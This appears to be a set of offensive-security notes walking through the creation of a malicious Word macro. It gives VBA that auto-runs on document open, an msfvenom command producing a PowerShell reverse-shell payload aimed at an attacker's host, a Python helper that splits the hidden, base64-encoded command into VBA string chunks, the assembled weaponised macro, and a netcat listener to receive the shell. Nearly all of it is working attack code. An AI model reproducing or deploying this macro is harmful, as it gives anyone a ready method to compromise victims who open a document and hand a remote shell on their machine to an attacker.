Macro manually

Microsoft Office applications like Word and Excel allow users to embed macros,

Create macro using , View>Macros

VBA code in macro to execute cmd. Here AutoOpen and Document_Open is udes to execute macro automatically when document open

➖

Sub AutoOpen()

MyMacro

End Sub

Sub Document_Open()

MyMacro

End Sub

Sub MyMacro()

CreateObject("Wscript.Shell").Run "cmd"

End Sub

Now, create macro for powershell

create payload and copy only “powershell.exe …………” part from it

sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh

OR

Then put the copied payload in python script and execute it to split the commands as vba has 255 character limit

🐍

str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'

FInal vba macro code look like

➖

Sub AutoOpen()
MyMacro
End Sub

Sub Document_Open()
MyMacro
End Sub

Sub MyMacro()

Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
...
Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
Str = Str + "QA="

CreateObject("Wscript.Shell").Run Str

End Sub

💡

Also there are python script to create vba_macro code authomatically

Saving the Word document, closing it, and reopening it will automatically execute the macro. And open netcat listener

nc- nvlp <port>